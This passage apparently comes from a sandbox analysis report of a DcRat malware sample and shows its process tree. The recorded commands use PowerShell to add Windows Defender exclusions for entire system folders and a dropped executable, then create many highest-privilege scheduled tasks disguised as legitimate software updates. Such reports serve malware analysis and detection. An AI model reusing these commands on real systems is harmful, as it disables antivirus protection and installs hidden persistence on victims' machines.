                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2780
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2596
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:708
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2228
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2440
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2880
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1692
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2040
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2728
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2640
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1952
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2888
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Roblox.exe'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2072
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2592
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VyvJW8hwqz.bat"
                                                                              7⤵
                                                                                PID:1552
                                                                                • C:\Windows\system32\chcp.com
                                                                                  chcp 65001
                                                                                  8⤵
                                                                                    PID:2084
                                                                                  • C:\Windows\system32\w32tm.exe
                                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                    8⤵
                                                                                      PID:2988
                                                                                    • C:\Users\Admin\AppData\Local\Roblox.exe
                                                                                      "C:\Users\Admin\AppData\Local\Roblox.exe"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2404
                                                                        • C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"
                                                                          2⤵
                                                                          • Modifies WinLogon for persistence
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Drops file in Windows directory
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2372
                                                                          • C:\Windows\system32\CMD.exe
                                                                            "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit
                                                                            3⤵
                                                                              PID:1664
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"
                                                                                4⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:1796
                                                                            • C:\Windows\system32\CMD.exe
                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                              3⤵
                                                                                PID:912
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                  4⤵
                                                                                    PID:2600
                                                                                • C:\Windows\system32\CMD.exe
                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit
                                                                                  3⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1720
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST
                                                                                    4⤵
                                                                                    • DcRat
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2312
                                                                                • C:\Windows\system32\CMD.exe
                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                  3⤵
                                                                                    PID:2596
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                      4⤵
                                                                                      • DcRat
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:1972
                                                                                  • C:\Windows\system32\CMD.exe
                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                    3⤵
                                                                                      PID:2704
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                        4⤵
                                                                                        • DcRat
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:1344
                                                                                    • C:\Windows\system32\CMD.exe
                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                      3⤵
                                                                                        PID:1804
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                          4⤵
                                                                                          • DcRat
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2316
                                                                                      • C:\Windows\system32\CMD.exe
                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                        3⤵
                                                                                          PID:2036
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                            4⤵
                                                                                            • DcRat
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1736
                                                                                        • C:\Windows\system32\CMD.exe
                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                          3⤵
                                                                                            PID:2704
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                              4⤵
                                                                                              • DcRat
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2656
                                                                                          • C:\Windows\system32\CMD.exe
                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                            3⤵
                                                                                              PID:2244
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                4⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2460
                                                                                            • C:\Windows\system32\CMD.exe
                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                              3⤵
                                                                                                PID:1000
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                  4⤵
                                                                                                  • DcRat
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1780
                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                3⤵
                                                                                                  PID:2880
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                    4⤵
                                                                                                      PID:1040
                                                                                                  • C:\Windows\system32\CMD.exe
                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                    3⤵
                                                                                                      PID:2236
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                        4⤵
                                                                                                        • DcRat
                                                                                                        PID:964
                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                      3⤵
                                                                                                        PID:1912
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                          4⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:1228
                                                                                                      • C:\Windows\system32\CMD.exe
                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                        3⤵
                                                                                                          PID:3068
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                            4⤵
                                                                                                            • DcRat
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:1696
                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                          3⤵
                                                                                                            PID:2084
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                              4⤵
                                                                                                              • DcRat
                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                              PID:2716
                                                                                                          • C:\Windows\system32\CMD.exe
                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                            3⤵
                                                                                                              PID:2432
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                4⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:956
                                                                                                            • C:\Windows\system32\CMD.exe
                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                              3⤵
                                                                                                                PID:2680
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                  4⤵
                                                                                                                  • DcRat
                                                                                                                  PID:2972
                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                3⤵
                                                                                                                  PID:2464
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                    4⤵
                                                                                                                    • DcRat
                                                                                                                    PID:1568
                                                                                                                • C:\Windows\system32\CMD.exe
                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                  3⤵
                                                                                                                    PID:2672
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                      4⤵
                                                                                                                      • DcRat
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:1644
                                                                                                                  • C:\Windows\system32\CMD.exe
                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                    3⤵
                                                                                                                      PID:1576
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                        4⤵
                                                                                                                        • DcRat
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:1624
                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                      3⤵
                                                                                                                        PID:2972
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                          4⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:2536
                                                                                                                      • C:\Windows\system32\CMD.exe
                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                        3⤵
                                                                                                                          PID:1292
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                            4⤵
                                                                                                                            • DcRat
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:2556
                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                          3⤵
                                                                                                                            PID:932
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                              4⤵
                                                                                                                                PID:2792
                                                                                                                            • C:\Windows\system32\CMD.exe
                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                              3⤵
                                                                                                                                PID:2764
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                  4⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:2900
                                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                3⤵
                                                                                                                                  PID:2592
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                    4⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1028
                                                                                                                                • C:\Windows\system32\CMD.exe
                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                  3⤵
                                                                                                                                    PID:1912
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                      4⤵
                                                                                                                                      • DcRat
                                                                                                                                      PID:1020
                                                                                                                                  • C:\Windows\system32\CMD.exe
                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                    3⤵
                                                                                                                                      PID:1440
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                        4⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2408
                                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                      3⤵
                                                                                                                                        PID:1288
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                          4⤵
                                                                                                                                          • DcRat
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2708
                                                                                                                                      • C:\Windows\system32\CMD.exe
                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                        3⤵
                                                                                                                                          PID:1664
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                            4⤵
                                                                                                                                            • DcRat
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:1392
                                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                          3⤵
                                                                                                                                            PID:1532
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                              4⤵
                                                                                                                                              • DcRat
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:2088
                                                                                                                                          • C:\Windows\system32\CMD.exe
                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                            3⤵
                                                                                                                                              PID:2860
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                4⤵
                                                                                                                                                • DcRat
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:2224
                                                                                                                                            • C:\Windows\system32\CMD.exe
                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                              3⤵
                                                                                                                                                PID:900
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                  4⤵
                                                                                                                                                  • DcRat
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:2528
                                                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                3⤵
                                                                                                                                                  PID:2252
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                    4⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:2344
                                                                                                                                                • C:\Windows\system32\CMD.exe
                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1772
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                      4⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1436
                                                                                                                                                  • C:\Windows\system32\CMD.exe
                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                    3⤵
                                                                                                                                                      PID:444
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                        4⤵
                                                                                                                                                        • DcRat
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:2272
                                                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2436
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                          4⤵
                                                                                                                                                          • DcRat
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:2696
                                                                                                                                                      • C:\Windows\system32\CMD.exe
                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2248
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                            4⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:1228
                                                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2560
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2888
                                                                                                                                                            • C:\Windows\system32\CMD.exe
                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1292
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
